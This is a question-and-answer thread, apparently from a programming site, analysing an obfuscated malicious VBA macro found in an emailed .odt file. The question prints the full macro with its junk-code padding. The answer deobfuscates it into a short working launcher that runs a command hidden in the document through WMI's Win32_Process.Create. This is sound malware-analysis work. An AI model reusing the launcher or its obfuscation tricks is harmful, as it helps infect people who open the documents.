如何从odt解密奇怪的宏？

Question

Hi everyone I found this macro (and other two macros like this) in an odt file sent by email. I know it is dangerous so i opened it in a VM with libre office on a linux distro.

Option VBASupport 1
    Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
   GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
   GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
   GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
sng2 = "qq)(" + "s2)(pq" + _
 "q)(s2)("
F7_if4svnte = "qq)(s" + _
 "2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
 "(sqq)(s2)(sqq)(s2)(qq)(s2)("
   GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
 "2)(inqq)(s2)(3qq)(s" + _
 "2)(2qq)(s2)(_qq)(s2)("
   GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
R67uawfvzvw = "wqq)(s2" + _
 ")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
   GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
   GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
   GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
   GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
   GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
   GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
   GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
   GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
   GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
   GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
   GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
   GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
   GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function

How can i see what this actually do? This is clearly encrypted, but there must be a way to decrypt this otherwise how can this be executed on any machine?

Answer 1

If you pay attention, you will see that almost every GoTo points to another GoTo and not to actual code. Most of the code you see does not even execute. It would fail with an error if it did, because it is trying to open non-existing files under the same file number, which is not allowed.

You can easily find the lines that do execute by following the GoTo chain, there is but a dozen of them.

Having identified them and removed the dead code that only exists to confuse the antimalware software, you will end up with three rather short functions:

Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
    HBYVV = ""
    S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
End Function

Function Tujor4m47ob()
    On Error Resume Next
    sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
    sng2 = "qq)(" + "s2)(pq" + _
 "q)(s2)("
    F7_if4svnte = "qq)(s" + _
 "2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
 "(sqq)(s2)(sqq)(s2)(qq)(s2)("
    Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
 "2)(inqq)(s2)(3qq)(s" + _
 "2)(2qq)(s2)(_qq)(s2)("
    R67uawfvzvw = "wqq)(s2" + _
 ")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
    Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
    Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
    Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
    Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
    Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
    Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function

Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
    On Error Resume Next
    H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
    Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
    C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function

If you then collapse the string literals into one and remove the bogus variables that are known to be empty at all times, you get:

Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
    S619csvpd1v4xzk5kc = VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq)(s2)(", "")
End Function

Function Tujor4m47ob()
    On Error Resume Next
    sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
    sng2 = "qq)(s2)(pqq)(s2)("
    F7_if4svnte = "qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
    Vbzhqcqh1pqco1e2_ = "qq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)("
    R67uawfvzvw = "wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)("
    Kz1yuitvz3qu6xai = ChrW(wdKeyS)
    Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
    Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
    Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
    Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
    Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function

Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
    On Error Resume Next
    H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
    Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
    C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function

Now you can probably give proper names to the functions and replace the obfuscated strings with the result of deobfuscating them:

Function RemoveBogusQqFromString(input_string)
    RemoveBogusQqFromString = VBA.Replace(input_string, "qq)(s2)(", "")
End Function

Function WrapperForRemoveBogusQqFromString(input_string)
    On Error Resume Next
    WrapperForRemoveBogusQqFromString = RemoveBogusQqFromString(input_string)
End Function

Function StartProcess()
    On Error Resume Next
    ObfuscatedCommandLineWithPrefix = T6dwlv_ivpoiq2.StoryRanges.Item(1)
    
    Set ProcessObjectInstance = CreateObject("winmgmts:win32_process")
    ObfuscatedCommandLine = Mid(ObfuscatedCommandLineWithPrefix, 5)
    ProcessObjectInstance.Create WrapperForRemoveBogusQqFromString(ObfuscatedCommandLine), "", ""
End Function

This takes an obfuscated command line stored in a Word object called T6dwlv_ivpoiq2 (I assume ThisDocument has been renamed to that) and runs it via Win32_Process::Create .